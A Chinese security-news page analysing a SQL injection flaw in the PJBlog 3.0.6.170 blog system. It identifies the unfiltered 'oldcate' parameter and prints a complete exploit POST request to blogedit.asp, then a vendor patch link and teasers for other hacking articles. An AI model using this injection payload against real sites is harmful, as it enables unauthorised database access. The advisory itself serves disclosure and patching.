个人博客系统程序pjblog的漏洞分析利用

2018-01-26 17:35:17责编：llp 来源：驱动管家人气：

影响版本:PJBlog 3.0.6.170

程序介绍:PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术。

漏洞分析:

在文件class/cls_logAction.asp中：

oldcate=request.form("oldcate") //第429行

oldctype=request.form("oldtype")

D = conn.execute("select cate_Part from blog_Category where cate_ID="&oldcate)(0)程序没有对变量oldcate做任何过滤放入sql查询语句中，导致注入漏洞的产生。

漏洞利用:

POST /blogedit.asp HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*

Referer: http://127.0.0.1/blogedit.asp?id=1

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)

Host: 127.0.0.1

Content-Length: 513

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: __utma=96992031.4542583209449947600.1239335726.1240296350.1240324232.7; __utmz=96992031.1239335726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PJBlog3Setting=ViewType=normal; PJBlog3=memRight=111111111111&memHashKey=c80f369e20b317566f736dbc70839834745d9c20&memName=

admin&exp=2010%2D4%2D21; ASPSESSIONIDCCDSDABA=OEBBHCODJFKIJEGKGCPHGMCP

id=1&log_editType=1&action=post&log_IsDraft=False&title=xxx&log_CateID=3&cname=xxx&ctype=0&oldcname=

xxx&oldtype=0&oldcate=3201=1&log_weather=sunny&log_Level=level3&log_comorder=1&blog_pws=

0&log_Readpw=&log_Pwtips=&c_pws=0&blog_Meta=0&evio_KeyWords=xxx&evio_Description=

web+safe&log_From=%E6%9C%AC%E7%AB%99%E5%8E%9F%E5%88%9B&log_FromURL=http%3A%2F%2Flocalhost%2Fbackci%2F&PubTimeType=com&PubTime=2009-4-21+15%3A54%3A46&tags=&UBBfonts=&UBBfonts=&UBBfonts=&UBBmethod=on&Message=web+safe&log_Intro=

web+safe&log_Quote=解决方案:

厂商补丁：

PJblog

-------

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://bbs.pjhome.net/thread-52214-1-1.html

保证数据安全需要做哪些事？哪些文件需要加密？怎么加密？
【编者按：生活中我们总会面对各种各样的数据，对于那些需要保密的数据我们会选择各类的加密方法。那么对于使用办公软件制作的文稿、表格、演示文稿和数据库我们如何加密呢？】在日常工作中，我们经常用一些办公
详情2018-01-25 10:19:10责编：llp 来源：驱动管家
open ssl的相关知识 open ssl的各种概念解析
OpenSSL的各种概念解析：公钥私钥签名验证签名加密解密非对称加密我们一般的加密是用一个密码加密文件,然后解密也用同样的密码这很好理解,这个是对称加密而有些加密时,加密用的一个密码,而解密用另外一组
详情2018-01-13 13:59:29责编：llp 来源：驱动管家
fckeditor是什么？fckeditor jsp版存在什么漏洞？
FCKeditor是目前最优秀的可见即可得网页编辑器之一，它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行，互联网上很容易找到相关技术文档，国内许多WEB项目和
详情2018-01-23 16:59:59责编：llp 来源：驱动管家
检查出使用窗口的特定程序的第一步是查看端口是否开放
在局域网使用中，我们常常会发现系统中开放了一些莫名其妙的端口，这就给系统的安全带来了一些隐患。为了让端口的使用尽在掌握之中，一些朋友就会使用第三方工具来进行检查出使用端口的特定程序究竟是谁，但实际
详情2018-01-22 09:02:10责编：llp 来源：驱动管家
畅无线应用破解中国移动wifi，提供免费无线上网服务
近日，一款名为“畅无线”的应用蹿红网络，原因在于，它利用中国移动的WiFi管理漏洞，为使用者提供免费的无线上网服务。该应用的开发商为上海云联计算机系统有限公司（以下简称云联），公司相关负责人向记者表
详情2018-01-25 15:29:50责编：llp 来源：驱动管家
黑客基地的渗透方法（冰兰黑客基地实例）
注：本人已经提交到C R S T ,适合新人学习首先是有个朋友对我说有个冰兰黑客基地，转载别人的文章还不著名作者，之后还蒙骗别人说他们能入侵国外站点所以就想检测一下首先看了以下他的站点，主站和论坛分
详情2018-01-04 17:49:34责编：llp 来源：驱动管家
什么是傲游浏览器的sql注射漏洞？
傲游浏览器的插件中心存在POST SQL注射漏洞http: extension maxthon cn all index phporhttp: chajian maxthon cn all index phppost data：keyword=%E6%90%9C%E7%B4%A2%E6%8F%92%E4%BB%B6修复方案：不敢献丑。。。作者 z@cx
详情2018-01-15 14:04:51责编：llp 来源：驱动管家
缓冲区溢出攻击编写缓冲区溢出漏洞利用程序
编写漏洞利用程序。在DIP(Dial-Up IP Protocol)程序的3 3 7o-uri(8 Feb 96)版本中，有一个缓冲区溢出漏洞。在一些Linux发布版本中这个程序是默认setuid。这个-l选项是有问题的。dip代码没有小心处理这个作为
详情2018-01-25 09:43:39责编：llp 来源：驱动管家
反arp攻击：局域网怎么隔离感染arp病毒的电脑？
局域网如何隔离感染ARP病毒的电脑呢？以下就是具体的实现方法。方法步骤局域网电脑是否存在ARP攻击的查看方法：点击“开始”-“程序”-“附件”-“运行”项来打开“运行“窗口，或者按”Windows+R“来打开，输入
详情2018-01-23 10:24:04责编：llp 来源：驱动管家
ie7浏览器有什么优点？ie7浏览器访问恶意网页会出现什么问题？
受影响系统：　　Microsoft Internet Explorer 7 0　　描述：　　BUGTRAQ ID: 28498　　Internet Explorer是微软发布的非常流行的WEB浏览器。　　如果用户用IE访问了恶意网页的话，则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有
详情2018-01-20 09:30:57责编：llp 来源：驱动管家